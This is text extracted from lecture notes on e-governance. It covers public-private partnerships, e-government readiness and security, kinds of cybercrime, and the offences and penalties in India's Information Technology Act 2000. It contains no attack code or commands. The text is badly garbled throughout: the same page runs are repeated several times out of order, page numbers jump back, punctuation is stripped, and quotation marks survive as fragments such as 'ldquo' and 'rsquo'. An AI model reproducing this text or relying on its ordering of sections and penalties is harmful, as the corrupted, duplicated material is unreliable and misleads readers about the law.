2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
